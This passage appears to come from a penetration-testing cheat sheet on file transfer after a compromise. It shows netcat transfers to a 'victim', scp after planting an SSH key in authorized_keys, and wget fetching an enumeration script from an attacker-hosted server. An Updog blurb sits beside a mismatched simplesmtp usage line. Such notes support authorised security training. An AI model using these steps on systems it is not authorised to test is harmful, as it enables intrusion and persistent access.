Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.
Usage: go run simplesmtp.go -save -i 0.0.0.0 -p 25
Windows
curl
Since Win10 1809 there is a build in curl
C:\Users\IEUser>curl.exe
curl: try 'curl --help' for more information
C:\Users\IEUser>curl.exe google.com/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.google.com/robots.txt">here</a>.</p>
<hr>
</body></html>
C:\Users\IEUser>
You can download a standalone compiled version of NC (Netcat) for windows from the nmap project (https://svn.nmap.org/nmap/ncat/), or use the kali compiled version, located in:
/usr/share/windows-binaries/nc.exe
If you're able to move the ncat to the victim you can use the normal nc functions to transfer more files (or gain a shell..)
On the attacker host:
nc 192.168.0.10 4444 < file.exe
On the victim:
ncat.exe -lvp 4444 > file.exe
Linux
scp
A built in SSH utility to trasfer files. once you gained access to the victim you can add a your pulic key to .ssh/authorized_keys or use credentials if found
Using public/private key - once a public key was copied to the victim .ssh folder, you can transfer files from the attacker to the victim by running:
scp file.exe -i id_rsa user@victim:/tmp/
The file will be transferred to the /tmp folder.
If you gained crednetials remove the -i id_rsa and login with the same command as above.
wget
wget is used to download files to the victim, run a web sever on the attacker by running:
python3 -m http.server
and download from the victim:
wget 192.168.0.1:8080/linenum.sh
curl
Curl is used to view web server source code, we can download files by running
curl https://url -o output.file.name
ftp
linux has a build in ftp utility, first created a listerner on the attacker host: